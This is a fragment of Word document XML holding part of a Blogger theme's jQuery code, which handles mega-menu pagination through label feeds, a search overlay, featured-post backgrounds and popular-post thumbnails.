        <w:t xml:space="preserve">                          if(nustg &gt;= (numa - 1)){</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            $(this).addClass('disable');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          }else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            $(this).removeClass('disable');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          if(nustg &lt; (numa)){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                            if(nustg &gt; 0){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              $(this).closest('.mega-naver').find('.mega-prev').removeClass('disable');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              $(this).closest('.mega-naver').find('.mega-prev').addClass('disable');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            //console.log('reauested');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            //show the loading wrapper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            $(this).closest('.mega').find('.mega-loading').fadeIn();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            var startindex = Number(nust) + Number(nuco);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            var nurl = '/feeds/posts/default/-/'+ nlb +'?alt=json-in-script&amp;start-index='+ startindex +'&amp;max-results=' + nuco;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            $.ajax({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              url : nurl,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              type: 'get',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              dataType: "jsonp",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              success: function(ne) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                //update details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                $at.attr('data-start',startindex);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                $at.attr('data-stage',(Number(nustg) + 1))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                var nc = '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                //console.log(JSON.stringify(ne));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                //process the data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                if(ne.feed.entry){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  for(var ma=0;ma&lt;ne.feed.entry.length;ma++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    var pst = ne.feed.entry[ma];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    //get date</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    var time = pst.published.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    time = time.split('T');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                    var mnt = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sept", "Oct", "Nov", "Dec"];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    time = time[0].split('-');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    time = mnt[Number(time[1]) - 1] + ' ' +  time[2] + ', ' + time[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    var pst_title = pst.title.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    for(var pxc=0;pxc&lt;pst.link.length;pxc++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      if(pst.link[pxc].rel == 'alternate'){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        var pst_url = pst.link[pxc].href;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    if(pst.media$thumbnail){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      var pst_pi = pst.media$thumbnail.url;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      //check for the location for thumbnail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      if(pst_pi.indexOf('/s72-c') !== -1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        pst_pi = pst_pi.replace('/s72-c','/s1600');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      if(pst_pi.indexOf('img.youtube.com') !== -1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        pst_pi = pst_pi.replace('/default.jpg','/maxresdefault.jpg');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    }else{</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      var pst_pi = 'https://3.bp.blogspot.com/-UKWIRzqbrE0/W2FUQVPeutI/AAAAAAAAACU/5JRAWbOBx9491ElSDj3krdSsZIfI7fjGwCLcBGAs/s1600/nf.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    }//mediathumbnail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    nc = nc + '&lt;div class="megamenu-item"&gt;&lt;div class="imgthumb"&gt;&lt;a href="'+ pst_url +'"&gt;&lt;div class="mega-img" style="background:url('+ pst_pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="imglink"&gt;&lt;span class="date-pub"&gt;'+ time +'&lt;/span&gt;&lt;h3&gt;&lt;a href="'+pst_url+'"&gt;'+ pst_title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                  nc = nc + '&lt;div class="mega-loading"&gt;&lt;div class="mega-table"&gt;&lt;div class="mega-cell"&gt;&lt;div class="lds-ripple"&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;h3&gt;Loading..&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  $at.closest('.mega').find('.mega-item-wrap').html(nc);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                }//nefeed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            });//AJAX</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          }//run only if not page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        });//CLICK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      $t.parent('li').addClass('static-object');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    }else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      //if entry = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            //mega end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $("#NavO ul").map(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              $(this).parent('li').addClass('has-submenu');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $('#NavO').children('ul').addClass('sf-menu');</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $('#NavO ul.sf-menu').superfish();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          });//navs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          $("#NavM ul").map(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $(this).parent('li').addClass('has-submenu');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          $('#NavM').children('ul').addClass('sf-menu');</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          $('#NavM ul.sf-menu').superfish();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        $('.search-act').map(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          $(this).click(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $('.search-activity').fadeIn();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $('.search-activity').addClass('isOpen');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        $('.s_close').map(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          $(this).click(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $('.search-activity').fadeOut();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $('.search-activity').removeClass('isOpen');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        //close search on esc key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        $(document).keyup(function(e) { </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          if (e.keyCode == 27) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $('.search-activity.isOpen').fadeOut();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $('.search-activity').removeClass('isOpen');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        //feature post</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        $('.FeaturedPost .post-summary').map(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          if($(this).find('.image')){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var u = $(this).find('.image').attr('src');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $(this).attr('style','background-image:'+'url('+ u + ');');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          $(this).append('&lt;div class=\'overlay\'&gt;&lt;/div&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        //snippet function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        function snip(cont, size_desc) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          return cont.replace(/&lt;.*?&gt;/gi, "").split(/\s+/).slice(0, size_desc - 1).join(" ");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        //popular posts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        $('.popular-posts li').map(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          if($(this).find('.item-thumbnail').length &lt; 1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var u = $(this).find('.item-title').find('a').attr('href');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var i = '&lt;div class="item-thumbnail"&gt;&lt;a href="'+u+'" target="_blank"&gt;&lt;img alt="" src="https://3.bp.blogspot.com/-a_5Ym6isv1s/Wa6y34E1qRI/AAAAAAAAAcc/mqp3av92yOkJz2OxtLHY_-Xp-m6EICahgCLcBGAs/w100-h80-p-k-no-no/nf.jpg" border="0"&gt;&lt;/a&gt;&lt;/div&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $(this).find('.item-content').prepend(i);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          }else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var img = $(this).find('.item-thumbnail').find('img');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var s = img.attr('src');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            if(s.indexOf('w72-h72-p-k-no-nu') != -1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              s = s.replace('w72-h72-p-k-no-nu','w90-h100-p-k-no-nu');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              img.attr('src',s);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            if(s.indexOf('w72-h72-n-k-no-nu') != -1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              s = s.replace('w72-h72-n-k-no-nu','w90-h100-n-k-no-nu');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              img.attr('src',s);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          //shrink the description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          if($(this).find('.item-snippet').length &gt; 0){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var $e = $(this).find('.item-snippet');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $e.html(snip($e.html(),13));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        //Labels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        $('.Label .widget-content li a,.melesa-max-limit').map(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          $(this).attr('href',$(this).attr('href') + '?&amp;max-results=' + perpage);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
